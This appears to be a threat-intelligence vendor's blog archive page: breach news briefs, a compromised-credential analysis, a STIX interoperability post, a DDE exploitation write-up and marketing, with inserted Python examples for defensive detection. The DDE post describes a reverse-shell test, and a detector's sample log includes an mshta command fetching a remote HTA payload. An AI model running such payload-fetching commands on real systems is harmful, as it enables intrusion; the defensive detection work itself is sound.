Author Archives: Mikayla Townsend

Threat Intelligence Brief: April 18, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.

Defense

“Great Western Railway urges online customers to update passwords after cyber-attack. The firm said hackers used an automated system to gain access to 1,000 customer accounts on its website and is taking action. While only a very small number of accounts have been affected by the attack, cybersecurity experts are complimenting the company’s proactive efforts to inform its customers of the best practice in these situations.”

 –The Sun

Energy

“A cyberattack that U.S. natural gas pipeline owners weren’t required to report has lawmakers taking a closer look at how the industry is handling such threats, raising the prospect of tighter regulation.

In website notices to customers this week, at least seven pipeline operators from Energy Transfer Partners LP to TransCanada Corp. said their third-party electronic communications systems were shut down, with five confirming the service disruptions were caused by hacking. But the companies didn’t have to alert the U.S. Transportation Security Administration, the agency that oversees the nation’s more than 2.6 million miles of oil and gas conduits in addition to providing security at airports.

Though the cyberattack didn’t disrupt the supply of gas to U.S. homes and businesses, it underscores that energy companies from power providers to pipeline operators and oil drillers are increasingly vulnerable to electronic sabotage. It also showed how even a minor attack can have ripple effects, forcing utilities to warn of billing delays and making it more difficult for analysts and traders to predict a key government report on gas stockpiles.

At a congressional hearing in March, Maria Cantwell, a Democratic senator from Washington, told Perry that budget cuts could make it more difficult to shield the energy sector from cyber intrusions. “Our energy infrastructure is under attack,” Cantwell said. “A year ago, I called for a comprehensive assessment of cyber attacks to our grid by Russians. We don’t need rhetoric at this point – we need action.” The threat appears to be widespread. Two years ago, the Department of Energy’s Pacific Northwest National Laboratory in Richland, Washington, said its firewall system blocks 25,000 cyberattacks a day.”

 –Bloomberg

Information Security Risk

“Several vulnerabilities have been found in the Linux command line tool Beep, including a potentially serious issue introduced by a patch for a privilege escalation flaw. An unnamed researcher discovered recently that Beep versions through 1.3.4 are affected by a race condition that allows a local attacker to escalate privileges to root. The security hole has been assigned CVE-2018-0492 and it has been sarcastically described as “the latest breakthrough in the field of acoustic cyber security research.” Someone created a dedicated website for it (holeybeep.ninja), a logo, and named it “Holey Beep.” The individual or individuals who set up the Holey Beep website have also provided a patch, but someone noticed that this fix actually introduces a potentially more serious vulnerability that allows arbitrary command execution.”

 –Security Week

Operational Risk

“The UK has conducted a “major offensive cyber-campaign” against the Islamic State group, the director of the intelligence agency GCHQ has revealed. The operation hindered the group’s ability to co-ordinate attacks and suppressed its propaganda, former MI5 agent Jeremy Fleming said. It is the first time the UK has systematically degraded an adversary’s online efforts in a military campaign. Mr Fleming made the remarks in his first public speech as GCHQ director. “The outcomes of these operations are wide-ranging,” he told the Cyber UK conference in Manchester. Mr Fleming said much of the cyber-operation was “too sensitive to talk about”, but had disrupted the group’s online activities and even destroyed equipment and networks. “This campaign shows how targeted and effective offensive cyber can be,” he added. But Mr Fleming said the fight against IS was not over, because the group continued to “seek to carry out or inspire further attacks in the UK” and find new “ungoverned spaces to base their operations”.”

 –BBC

The post Threat Intelligence Brief: April 18, 2018 appeared first on LookingGlass Cyber Solutions Inc..

RSA Preview: Compromised Credentials are STILL Your Organization’s Worst Nightmare

RSA, the industry’s biggest (arguably) conference, starts this week. Before you get blinded by all of the shiny new technology and product and acquisition announcements, remember that having clean cybersecurity hygiene begins with the basics – patch and routinely update your systems, educate your employees, protect your passwords.

LookingGlass has access to a lot of places on the Internet, including the Deep and Dark Web where most data dumps and password leaks occur. Armed with this information, we are able to maintain a proprietary Data Breach Detection System (DBDS) that continuously scours underground forums, hacker channels, and the dark web to uncover the latest data breaches and identify compromised accounts. Adding an average of several million findings per week, this system contains almost 5 billion records that are connected to approximately 3.5 billion unique username/password pairs.

As we see cyber attacks increase in size and sophistication, we often forget that some of the biggest attacks started with basic password cracking or a phishing/social engineering scheme. Analyzing compromised credentials can reveal a lot about the cybersecurity practices of organizations across verticals, and of all sizes. LookingGlass reviewed all compromised credentials within our DBDS from 2017 for the Fortune 100 companies and discovered that the most heavily-impacted business sectors were Technology, Financial, Insurance, and Telecommunications. The below chart compares the unique credentials LookingGlass uncovered in 2017 for the Fortune 100 companies by sector.

In addition, across all Fortune 100 companies, an average of 33% of all employees reused their login credentials. Organizations within the Telecommunications sector represented the highest percentage of reused login credentials, with nearly 45% of employees reusing usernames and passwords across multiple IT systems and web applications.

Credential reuse is a significant concern to organizations across all business sectors because threat actors routinely use lists of these compromised credentials to gain access to business networks via web applications and other public-facing network infrastructure. For example, it is simple for a threat actor to check for Web-based email services associated with each domain, potentially allowing a hacker to access the user’s work email account and to view or exfiltrate any sensitive information it may contain.

Assuming that the LookingGlass sample for Fortune 100 companies is a reflection of global organizational trends in credential security hygiene, we judge that at least one-third to one-half of the compromised credentials could likely facilitate illicit access, or cause otherwise negative repercussions, to many organizations. This threat is further exacerbated if an organization is unaware of credential compromises relevant to them or does not have other security measures in place to mitigate the risk of compromised credentials, such as two-factor authentication.
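The analysis described above, as an added example in Python that is not LookingGlass code and assumes nothing about how the DBDS stores or matches records: it takes breach records from several unrelated leaks, keeps only those for domains the organization owns, and flags accounts whose identical password appears in more than one leak, which is the signal that the user reuses it across services. The records, domains and sector labels are constructed for the demonstration.

```python
"""Triage of compromised-credential records against an organization's domains.

Added example; not LookingGlass code. Breach records, domains and sector
labels below are constructed. Plaintext passwords appear only because the
sample is constructed; the code hashes them on ingest and never keeps them.
"""
import hashlib
from collections import defaultdict

# Constructed sample: (source leak, email, password) as pulled from several
# unrelated leaks.
SAMPLE_RECORDS = [
    ("leak-a", "alice@example-telco.com", "Winter2017!"),
    ("leak-b", "alice@example-telco.com", "Winter2017!"),         # same password in two leaks
    ("leak-a", "bob@example-telco.com", "hunter2"),
    ("leak-c", "bob@example-telco.com", "correct horse staple"),  # different passwords
    ("leak-b", "carol@example-bank.com", "P@ssw0rd"),
    ("leak-c", "CAROL@Example-Bank.com", "P@ssw0rd"),             # same account, case differs
    ("leak-a", "dave@unrelated.example", "qwerty"),               # not a watched domain
]

# Domains the organization owns, mapped to the sector used for reporting (constructed).
WATCHED_DOMAINS = {
    "example-telco.com": "Telecommunications",
    "example-bank.com": "Financial",
}


def fingerprint(password: str) -> str:
    """Unsalted hash so equal passwords compare equal across leaks. This is a
    comparison key for triage, not password storage; the plaintext is dropped."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()[:16]


def split_email(email: str):
    """Lower-case and split 'local@domain' into (local, domain)."""
    local, _, domain = email.strip().lower().rpartition("@")
    return local, domain


def triage(records, watched_domains=WATCHED_DOMAINS):
    """Count exposed accounts per sector and flag accounts whose identical
    password shows up in more than one leak (credential reuse).
    Returns (per-sector stats, sorted list of reusing accounts)."""
    hits = defaultdict(set)  # account -> {(leak, fingerprint)}
    for leak, email, password in records:
        local, domain = split_email(email)
        if domain not in watched_domains:
            continue
        hits[f"{local}@{domain}"].add((leak, fingerprint(password)))

    per_sector = defaultdict(lambda: {"exposed_accounts": 0, "reusing_accounts": 0})
    reusing = []
    for account, pairs in hits.items():
        sector = watched_domains[account.rpartition("@")[2]]
        per_sector[sector]["exposed_accounts"] += 1
        leaks_by_fp = defaultdict(set)
        for leak, fp in pairs:
            leaks_by_fp[fp].add(leak)
        # One password seen in two or more independent leaks => reused across services.
        if any(len(leaks) > 1 for leaks in leaks_by_fp.values()):
            per_sector[sector]["reusing_accounts"] += 1
            reusing.append(account)

    for stats in per_sector.values():
        stats["reuse_rate"] = round(stats["reusing_accounts"] / stats["exposed_accounts"], 2)
    return dict(per_sector), sorted(reusing)


if __name__ == "__main__":
    sectors, accounts = triage(SAMPLE_RECORDS)
    for sector, stats in sorted(sectors.items()):
        print(f"{sector}: {stats}")
    print("accounts to force-reset and enroll in 2FA:", accounts)
```

The reuse signal is deliberately conservative: two leaks from different services containing the same password for the same account is strong evidence of reuse, whereas the same password appearing twice inside a single leak is usually just a duplicate row. Accounts in the returned list are the ones a defender resets first and enrolls in two-factor authentication.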

3 Steps Organizations Can Take to Protect User Credentials

  1. Encourage and Enforce Password Hygiene Best Practices – Educate employees on best practices associated with password hygiene (i.e. frequently change credentials, diversify passwords across accounts, etc.). Require employees to routinely update their passwords and avoid repeated use across multiple platforms.
  2. Manage Your Third Party Risks – Consistently monitor who is accessing your network and hardware. Are they trying to access areas of the network they shouldn’t be? Limit third parties’ access to specific portions of the network instead of allowing them to roam free.
  3. Back Up Your Data! – If your credentials are compromised, it will be easier to replace than to start from scratch.
  4. Educate Your Employees – Phishing attacks are still one of the biggest ways organizations are breached. Don’t give away confidential information, like your password.


How Can LookingGlass Help These Steps?

LookingGlass offers tiered solutions to help organizations deal with the risks compromised credentials pose to you and your key vendors:

  • The LookingGlass Baseline Attack Surface Report™ is a cost-effective first step in determining which of your vendors pose the most risk to your organization. Your report will not only provide a historical analysis but also help you meet compliance and regulatory requirements when the occasion arises.
  • The LookingGlass Cyber Attack Surface Analysis™ is a deep-dive assessment of vendors that may have access to your organization’s networks and sensitive data. It not only provides a historical analysis of potential compromise, but may also assist your organization in meeting compliance and regulatory requirements. In addition, the Cyber Attack Surface Analysis can evaluate the cybersecurity hygiene of a company when conducting M&A activity.
  • The LookingGlass Third Party Risk Monitoring service delivers continuous visibility into the risk exposure and attack surface of your organization’s key vendors. This is an outsourced way to analyze your third party vendors’ risk impact to your organization. Our managed service keeps a watchful eye on your vendors’ networks 24/7/365, helping you to make informed, intelligent decisions about the cyber safety of your organization.


In addition, protect your organization’s attack surface with one of the LookingGlass “as-a-Service” offerings: Information Security, Brand Security, or Physical Security Monitoring:

  • Information Security-as-a-Service™: Protect your organization’s network and sensitive data. LookingGlass analysts monitor and identify information security threats such as phishing, malware, ransomware, and more.
  • Brand Security-as-a-Service™: Protect your organization’s brand, trademarks/logos, intellectual property, and online reputation.
  • Physical Security Monitoring-as-a-Service™: LookingGlass analysts monitor for risks to your organization’s most valuable physical assets, such as imposter social media accounts, unauthorized domain names, and threats against employees, executives, and facilities.

Interested in learning more about any of our offerings, or want to chat with one of our security experts? Find us at RSA – Booth 100 in the South Hall.


Why Cyber Response Mechanisms Must Talk to Each Other…

As I was preparing to write this blog on the importance of interoperability across cyber defense systems, I read the following news article: “Why America’s Two Best Fighter Jets Can’t Talk to Each Other”. One of the salient points in this article is that the communication systems in the newer-model fighter jet are reportedly not integrated with those of an older model.

Two article quotes drew my attention particularly:

“The U.S. fifth-generation jets are adept at disseminating a more detailed view of the battle space to older aircraft, increasing the former’s “survivability” in combat…”

“The thing that’s great about having Link 16 and MADL onboard and the sensor fusion is the amount of situational awareness the pilot has…”

An integrated communication system is a vital part of these fighter jets and the combined strength those fighters provide. A similar point can be made about the lack of interoperability and easy integration in cyber defense between cybersecurity systems.

The issues these fighter jets have illustrate the technical, business, and organizational challenges that can get in the way of the technology integrations necessary for the effective use of technology intended to protect and defend. More importantly, the impact on the security of organizations can be significant when defensive systems are not integrated in meaningful and effective ways.

Recently, I had the opportunity to discuss the key challenges faced in cyber defense integration in a joint webinar with Jason Keirstead (IBM Security) and Henry Peltokangas (Cisco Systems) on Cyber Threat Intelligence Collaboration.


Why does interoperability matter?

Whether at a small-medium enterprise or the largest multi-national organization, most security deployments generally share these common characteristics:

No Single Vendor

  • Typically, there is no single vendor that has deployed all of the systems that must exchange Cyber Threat Intelligence (CTI) and Security telemetry (e.g. events, logs).
  • Many organizations choose best of breed for firewalls vs. identity authentication vs. Intrusion Detection Systems (IDS) vs. web proxies vs. threat analysis platforms.

Multi-Functional

  • One of the primary reasons for having different products (from different vendors) in a security deployment is that each product performs vital tasks and functions and may not even be run or operated by the same security analysis and security operations teams.

Coordinated Action

  • Teams and their respective products must work collaboratively to collect, analyze, refine, and ultimately operationalize CTI.
  • The complexity involved in building security systems can be quite daunting but it becomes even more complex if those systems need to share data and actions to make security work successfully.
  • Oftentimes, real-time data may indicate a threat that must be acted upon quickly, but without suitable interoperable systems working collaboratively it’s almost impossible to provide an effective real-time response.

Ultimately, the goals for interoperability are to drive ease of deployment and ease of maintenance, and to ensure that complex system tasks can be performed when systems connect together.

Sounds easy?

Here’s a recent example that helps explain the challenge:

Real World Technology Fail Example

In this scenario, a multi-national organization purchased a Threat Intelligence Platform (TIP) from one vendor and an Endpoint Protection system from a second vendor. Both vendors had developed their products to exchange OASIS STIX/TAXII Version 1 standards-based intelligence. Both vendors claimed their products supported the standard protocol and content.

When the multi-national organization came to connect those systems together the TIP and Endpoint Protection system failed to exchange intelligence correctly. After initially trying to debug the issue themselves, the organization escalated the integration challenges to both vendors to resolve the communication issues.

Fortunately, in this scenario both vendors were able to investigate and come up with a solution to integrate the CTI products successfully. However, the reality is that even with standards (as a basis for security integration), there remains ample opportunity for technology companies to miss important aspects that end up sabotaging off-the-shelf integration with other vendors.
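The failure mode in the scenario above, as an added example in Python that is not code from either vendor: a producer and a consumer that both “support the standard”, where one detail the producer gets wrong makes the consumer reject every object. It uses STIX 2.1 JSON rather than the STIX/TAXII Version 1 XML of the anecdote (the pattern of the failure is the same), and the indicator values are constructed. The specific defect shown is a timestamp serialized as RFC 3339 `+00:00`, which STIX requires to be written with a literal `Z`.

```python
"""A STIX 2.1 indicator exchange between a producer and a strict consumer.

Added example, not code from either vendor in the story. The indicator
values are constructed; 198.51.100.0/24 is a documentation address range.
"""
import json
import re
import uuid
from datetime import datetime, timezone

# STIX 2.1 timestamps must be UTC with a literal "Z" designator; "+00:00" is
# a valid RFC 3339 offset but not a valid STIX timestamp.
STIX_TIMESTAMP = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(\.\d+)?Z$")
REQUIRED = ("type", "spec_version", "id", "created", "modified",
            "pattern", "pattern_type", "valid_from")


def stix_timestamp(dt: datetime) -> str:
    """Conformant serialization: millisecond precision and a 'Z' suffix."""
    dt = dt.astimezone(timezone.utc)
    return dt.strftime("%Y-%m-%dT%H:%M:%S.") + f"{dt.microsecond // 1000:03d}Z"


def naive_timestamp(dt: datetime) -> str:
    """What a producer that simply calls isoformat() emits: '...+00:00'."""
    return dt.astimezone(timezone.utc).isoformat()


def make_indicator(ipv4: str, now: datetime, ts) -> dict:
    """Producer side: one indicator for a constructed IOC, timestamps via ts()."""
    stamp = ts(now)
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": stamp,
        "modified": stamp,
        "name": "Constructed example IOC",
        "pattern": f"[ipv4-addr:value = '{ipv4}']",
        "pattern_type": "stix",
        "valid_from": stamp,
    }


def validate_indicator(obj: dict) -> list:
    """Consumer side: return the conformance problems found (empty = accepted)."""
    problems = [f"missing {key}" for key in REQUIRED if key not in obj]
    if obj.get("type") != "indicator":
        problems.append("type must be 'indicator'")
    if not re.fullmatch(r"indicator--[0-9a-f-]{36}", str(obj.get("id", ""))):
        problems.append("id must be 'indicator--<uuid>'")
    for key in ("created", "modified", "valid_from"):
        if key in obj and not STIX_TIMESTAMP.match(str(obj[key])):
            problems.append(f"{key} is not a STIX timestamp: {obj[key]}")
    pattern = str(obj.get("pattern", ""))
    # Shallow check only; a real consumer parses the full STIX pattern grammar.
    if obj.get("pattern_type") == "stix" and not (pattern.startswith("[") and pattern.endswith("]")):
        problems.append("pattern is not a bracketed STIX comparison expression")
    return problems


def exchange(ts) -> list:
    """Serialize on the producer, parse on the consumer, report what the consumer rejects."""
    now = datetime(2018, 4, 18, 12, 0, 0, tzinfo=timezone.utc)
    wire = json.dumps(make_indicator("198.51.100.7", now, ts))  # constructed IOC
    return validate_indicator(json.loads(wire))


if __name__ == "__main__":
    print("naive producer :", exchange(naive_timestamp))
    print("conformant     :", exchange(stix_timestamp))
```

Both sides here are individually reasonable and would pass a casual demo; the defect only surfaces when the objects cross the wire, which is exactly why an interoperability test with the other vendor’s actual product, rather than a self-test against one’s own reader, is the check worth running before claiming support for a standard.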

The Impact

The above example shows the negative consequences that failed or difficult integration of products from various vendors has on security. More specifically, the following areas are most impacted:

Expertise & Human Assets

  • Expertise is needed to understand, technically, what is working.
  • Organizations have to learn a lot more about what the technology is doing to share content between systems.
  • It takes time to either hire or train people, as well as to learn about the different product interfaces, instead of just expecting them to ‘work’.

Time & Costs

  • Multiple days or weeks to make it ‘work’.
  • Multiple organizations involved.
  • Costs of people and systems time without operational benefits.

Capability

  • Point products have limits to what features they provide as standalone solutions.
  • Point products are limited to what they can detect and block when not an integrated system.
  • Introducing CTI into deployments consisting of multiple point products results in the worst case where each product has its own blacklist or method of consuming the intelligence and the security team has to manually copy/paste the intelligence to each.
  • It adds huge amounts of human error that can undermine protection.
  • In many cases, the lack of coordinated capability can cause unexpected results and, worse, could undermine protection.

As a result, the true winners are the adversaries.

What should we do?

There are a few ways to improve and implement interoperability in your organization. In my next blog, I’ll give you some best practices including:

  • STIX Preferred program
  • Interoperability key tenets

If you want to discuss this blog or integrated LookingGlass cyber defense solutions, please reach out to me on Twitter (@tweet_a_t) or contact us. If you are going to RSA 2018, please come to the STIX and TAXII Meet-up on April 18, 2018 to chat with me more on this topic.



Threat Intelligence Brief: April 11, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.

Information Security Risk

“Retailer Hudson’s Bay Co disclosed that it was the victim of a security breach that compromised data on payment cards used at Saks and Lord & Taylor stores in North America. One cyber security firm said that it has evidence that millions of cards may have been compromised, which would make the breach one of the largest involving payment cards over the past year, but added that it was too soon to confirm whether that was the case. Hacking group JokerStash a.k.a. Fin7 is alleged to have spent a year collecting payment card records with the intention of selling the compromised accounts on the dark web.”

 –Reuters

Insurance + Healthcare

“New Jersey’s Division of Consumer Affairs is levying a fine against Virtua Medical Group after the provider organization suffered a breach that released the protected health information of several hundred of its patients two years ago. The network of physicians, which spans more than 50 South Jersey practices and part of the Virtua Health delivery system, will pay a total of $417,816 and improve data security following a breach of protected health information affecting 1,654 patients whose health records were found to be viewable on the Internet because of a server misconfiguration by a vendor in January 2016.”

 –Health Data Management

Retail

“Sears Holding Corp, Best Buy, and Delta Air Lines have announced that some of their customer payment information may have been exposed in a cyber security breach at software service provider [24]7.ai. In a statement made by Delta Airline, cybercriminals planted a piece of malware in [24]7.ai software, which captured some payment card data between September 26 and October 12, 2017. Sears and Delta said they were only notified by [24]7.ai in mid and late March, several months after the breach had been supposedly contained.”

 –Reuters

Operational Risk

“Malaysia’s central bank announced that it has suffered a cyberattack in which hackers sought to steal money through fraudulent wire transfers over the SWIFT network. The bank did not disclose who was behind the attack or how they accessed its SWIFT servers while also noting that no funds were lost. The incident marked the second known hack of a central bank after the 2016 theft of $81 million from the Bangladesh Bank.”

 –Nasdaq


DDE Exploitation – Macros Aren’t the Only Thing You Should be Counting

Exploitation of the Microsoft® Dynamic Data Exchange (DDE) protocol is increasingly being used to launch malicious code in weaponized email attachments. A native Microsoft feature, DDE allows data to be pulled from other sources, such as updating a spreadsheet from an external database. As with many features, DDE can be leveraged for malicious purposes.

Old Dog, New Tricks

Malicious email attachments are nothing new, but the traditional attack vector has been via macros embedded into the files. Macros are simply shortcuts for sequences of commands and/or keystrokes. Studies show that at least a quarter of phishing attempts involve malicious macros embedded in Microsoft Office documents. As noted by the SANS Internet Storm Center, “…attackers are using DDE because it’s different. We’ve been seeing the same macro-based attacks for years now, so perhaps criminals are trying something different just to see if it works any better.”

Apparently, DDE exploitation does work, as observed in several malware campaigns, including distribution of Locky ransomware through the Necurs botnet and also in the spread of the Hancitor downloader. The technique was also used against Fannie Mae employees in October 2017, when attackers sent phishing emails promising free tickets to a Halloween event at a local Six Flags amusement park. More recently, DDE exploitation was found being used in the Dridex banking trojan to execute a shell command to download malware. It was also used in association with the distribution of the Zyklon backdoor.

Of Course, There’s a Metasploit Module for That

The DDE exploit can be created using custom Metasploit modules available through GitHub and other sources. The LookingGlass™ research team tested a module designed to open a backdoor communication channel (reverse shell) between the victim and attacker.

Once the exploit is configured, the next step is crafting the malicious Microsoft Office document. This is done by inserting a coded field that contains the output from the Metasploit DDE module.

DDE exploit embedded in Word Document


Syntax of the code in our test case is as follows:

DDE Exploit Code

The document is then sent to victims, typically via a phishing email, and targets Microsoft Word on a Windows operating system. When the victim opens the document, they are presented with a pop-up that prompts them to “update” the document with data from linked files. The default response is no, but if the user clicks yes, the malicious code will be launched using the Microsoft HTML Application Host (mshta.exe) and PowerShell to retrieve the HTML Application (HTA) payload from the remote server.

DDE Exploit Pop-Up Window


In our test case, the code enabled a connection back to our “attack” server. From that session, we were able to remotely run commands and upload and download files. This activity was not readily observable from the victim computer. Interestingly, the connection remains open even if the document is closed.

Established Connection Between Victim and Attacker


File Download Example

Avoiding the DDE Phishing Hook

Unfortunately, infected files are not easy to signature since the exploits can vary widely in syntax and the documents themselves can contain a variety of text and images.

If you are a systems admin or IT practitioner, here are some things you can do to protect your organization’s network:

  • Use Windows Defender (it can detect use of DDE exploits), and consider turning off DDE itself in the Windows registry
  • Monitor outbound connections, particularly on unusual ports
  • Provide phishing education for users

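The launch chain described in this post (Word spawning mshta.exe, which in turn runs PowerShell to fetch the HTA payload) is what an endpoint detection rule keys on, because the document itself is hard to signature. The following is an added example in Python, not LookingGlass code or part of the original post: it runs the rule over constructed process-creation records in a simple pipe-delimited form (assumed; adapt the parser to your EDR or Sysmon export). The host names, paths and URL in the sample are made up, and 203.0.113.0/24 is a documentation address range.

```python
"""Detect an Office process spawning mshta.exe/PowerShell (the DDE launch chain).

Added example, not LookingGlass code. The log format and all records below
are constructed; the logic generalizes to any parent/child process telemetry.
"""
import ntpath

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# The children the post names (mshta.exe, PowerShell) plus the usual script hosts.
SUSPECT_CHILDREN = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Constructed records: timestamp|host|parent image|child image|command line
SAMPLE_LOG = r"""
2018-04-10T09:12:01Z|ws-17|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|C:\Windows\System32\mshta.exe|mshta http://203.0.113.5/update.hta
2018-04-10T09:12:03Z|ws-17|C:\Windows\System32\mshta.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -w hidden -c "<constructed placeholder>"
2018-04-10T09:15:44Z|ws-22|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|"WINWORD.EXE" /n report.docx
2018-04-10T09:20:10Z|ws-22|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|C:\Windows\splwow64.exe|splwow64.exe 12288
2018-04-10T10:02:00Z|ws-09|C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell Get-Process
"""


def parse(line: str) -> dict:
    """Split one record; image paths are reduced to a lower-cased basename
    (ntpath handles the backslashes regardless of the host running this)."""
    ts, host, parent, child, cmdline = line.split("|", 4)
    return {
        "ts": ts,
        "host": host,
        "parent": ntpath.basename(parent).lower(),
        "child": ntpath.basename(child).lower(),
        "cmdline": cmdline,
    }


def detect(lines) -> list:
    """Return one alert per suspicious parent/child pair.

    Rule 1: an Office application starting a script host. Severity is raised
            when the command line carries a URL, i.e. it reaches out for a payload.
    Rule 2: mshta.exe starting PowerShell, the second hop of the same chain.
    """
    alerts = []
    for raw in lines:
        if not raw.strip():
            continue
        ev = parse(raw)
        lowered = ev["cmdline"].lower()
        remote = "http://" in lowered or "https://" in lowered
        if ev["parent"] in OFFICE_PARENTS and ev["child"] in SUSPECT_CHILDREN:
            alerts.append({
                "host": ev["host"], "ts": ev["ts"],
                "chain": f'{ev["parent"]} -> {ev["child"]}',
                "severity": "high" if remote else "medium",
                "cmdline": ev["cmdline"],
            })
        elif ev["parent"] == "mshta.exe" and ev["child"] == "powershell.exe":
            alerts.append({
                "host": ev["host"], "ts": ev["ts"],
                "chain": "mshta.exe -> powershell.exe",
                "severity": "high",
                "cmdline": ev["cmdline"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(f'{alert["ts"]} {alert["host"]} [{alert["severity"]}] {alert["chain"]}: {alert["cmdline"]}')
```

Only the two records from host ws-17 fire: Word launching mshta.exe with a URL on the command line, then mshta.exe launching PowerShell. Word spawning the print spooler helper on ws-22 and an administrator running PowerShell from a shell on ws-09 are left alone, which is the point of anchoring the rule on the parent process rather than on PowerShell or mshta.exe in isolation. Because the post notes that the attacker's session stays open after the document is closed, this rule pairs naturally with the outbound-connection monitoring listed above.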
At this point, we all know cyber threats are becoming more sophisticated and targeted. Creating a culture of security in your organization and practicing basic cyber hygiene are the easiest and fastest ways to keep your networks clean and the bad guys out.

Want more insights like this into new vulnerabilities and exploits? Learn more here.

Marcelle Lee is a LookingGlass threat researcher who is active in the cybersecurity community. Check out her upcoming speaking opportunities here and reach out to her on Twitter at @Marcelle_FSG.



LookingGlass Cyber Solutions Receives 5-Star Rating in CRN 2018 Partner Program Guide


Cyber Guardian Network Recognized as a Top Partner Program for the Second Consecutive Year

Reston, VA – April 2, 2018 – LookingGlass™ Cyber Solutions, a leader in threat intelligence-driven security, today announced its Cyber Guardian Network received its second consecutive 5-Star rating in CRN’s Partner Program Guide. The Partner Program Guide is a listing of partner programs providing products and services through the IT channel. The 5-Star designation is reserved for a subset of companies offering the best partnering elements to their solution provider partners.

Launched in 2017, LookingGlass’ Cyber Guardian Network focuses on empowering security teams around the world to confidently prevent, detect, understand and respond to prioritized, relevant threats throughout every stage of the threat lifecycle. Specifically, LookingGlass enables Managed Security Services Providers (MSSPs) and solution providers to augment their existing security services portfolios with LookingGlass’ Threat Intelligence-as-a-Service offerings and deliver information security, brand security or physical security monitoring and protection, backed by LookingGlass’ global team of security experts.

“The LookingGlass team is proud to receive this recognition from CRN for a second consecutive year as we consistently strive to deliver relevant, high-quality threat intelligence products and services to our partners and customers around the world,” said Pete Agresta, Chief Revenue Officer at LookingGlass Cyber Solutions. “Over the past year and a half, more than 50 companies have joined the Cyber Guardian Network – a testament to the value our program delivers to our partners as they help their customers select the ideal solutions to efficiently and effectively combat today’s sophisticated cyber attacks.”

The LookingGlass Cyber Guardian Network is consistently recognized for the value it provides companies around the world via an extensive network of resellers. In addition to the Partner Program Guide recognition, Laurie Potratz was named a 2017 and 2018 CRN Channel Chief, recognizing her leadership of LookingGlass’ partner program and her dedication to the IT channel.

For more information or to join the LookingGlass Cyber Guardian Network, visit https://partners.lookingglasscyber.com/English/.


About LookingGlass

LookingGlass Cyber Solutions delivers unified threat protection against sophisticated cyber attacks to global enterprises and government agencies by operationalizing threat intelligence across its end-to-end portfolio. Scalable threat intelligence platforms and network-based threat response products consume our machine-readable data feeds to provide comprehensive threat-driven security. Augmenting the solutions portfolio is a worldwide team of security analysts who continuously enrich our data feeds and provide customers unprecedented understanding and response capability into cyber, physical and 3rd party risks. Prioritized, relevant and timely insights enable customers to take action on threat intelligence across the different stages of the attack life cycle. Learn more at https://www.lookingglasscyber.com/.


Contact

Christy Pittman
W2 Communications for LookingGlass
Christy@w2comm.com
703-877-8108


Source: https://www.businesswire.com/news/home/20180402005325/en/LookingGlass-Cyber-Solutions-Receives-5-Star-Rating-CRN


Elevating Your Security Posture with Threat-Intelligence-as-a-Service

Every enterprise organization is in a security arms-race that they must win. As technology becomes ever-more intertwined into every business process and every element of the customer experience, the impact of a security breach becomes catastrophic.

Of course, every enterprise already knows this.

The question, however, is what to do about it when the organization must also evolve and expand its technology stack to meet the insatiable needs of its customers and the market.

As the attack surfaces continue to proliferate, enterprises cannot turn away or let their guard down. Instead, they must find a way to continually elevate their security posture and get ahead of the bad actors who are, likewise, continually seeking a vulnerability that will give them an opening.

A more efficient and effective way of approaching cybersecurity promises to help enterprises get the upper hand in this game of cat-and-mouse by identifying emerging threats before an attack begins — and delivering this intelligence in an actionable form without the overhead. The approach? Threat-intelligence-as-a-service.

The Losing Battle for Containment

When it comes to an organization’s security posture, there’s a natural evolution that occurs. The first stage of evolution is all about containment and perimeter security.

In this first stage, the focus is on establishing a perimeter, securing it and then containing any further exposure. This need for containment is so that organizations can define the theater of engagement — ensuring that what’s inside is safe so they can focus resources on protecting the perimeter.

This type of first-stage security posture has been the predominant focus of IT organizations. But this kind of security posture only works when you can effectively define and contain your perimeter — or, as it is also called, your attack surface.

As your attack surface expands or changes, especially when it is doing so at a rapid rate, containment becomes almost impossible. In these situations of an uncontainable attack surface — precisely what is happening now in the era of digital transformation — the organization must evolve its security posture to the next level. The question is how?

Why Threat Intelligence is in Your as-a-Service Future

The natural response to dealing with an expanding attack surface is to keep doing the same things – just faster and more expansively. This approach, however, is not only exhausting, it’s ineffective.

It’s a bit like trying to keep all the plates spinning on their poles – it’s only a matter of time before it all comes crashing down.

Organizations must, therefore, find a way to identify threats before they ever reach their dynamic and expanding perimeter and then respond preemptively. We call this concept of identifying threats before a security event has happened threat intelligence.

On the surface, employing threat intelligence sounds like the next logical step to proactively protect the organization’s hard-to-contain perimeter. But doing so is much harder than it sounds.

Identifying emerging threats to the enterprise, without creating a debilitating surge of false-positive alerts, requires equal measures of intelligence information, triage capabilities, and expertise to identify indicators that represent a threat to the enterprise.

Delivering effective threat intelligence is a mixture of science and art – and a capability that many enterprises are finding difficult and expensive to build in-house.

Threat Intelligence-as-a-Service, however, promises to deliver the threat intelligence capabilities that enterprises need, without the cost and overhead of building it themselves. Utilizing a managed service for threat intelligence will help enterprises develop this now-essential capability while minimizing the resource impact to the organization.

The Intellyx Take

It may be discomforting for enterprise executives to hear that they need to elevate their security posture and expand their already resource-strapped security operations further afield.

Creating a threat intelligence capability is not the core business of most enterprises. It is nevertheless essential for enterprise leaders to take an active response posture and engage threats far beyond their continuously evolving perimeter. Doing so, however, requires intelligence about those threats and the skills and expertise to make sense of the intelligence data.

This need for intelligence, coupled with the desire not to build and manage a threat intelligence capability in-house, is why enterprises are now turning to industry pioneers such as LookingGlass and their threat-intelligence-as-a-service offerings, striking the balance by outsourcing this critical capability.

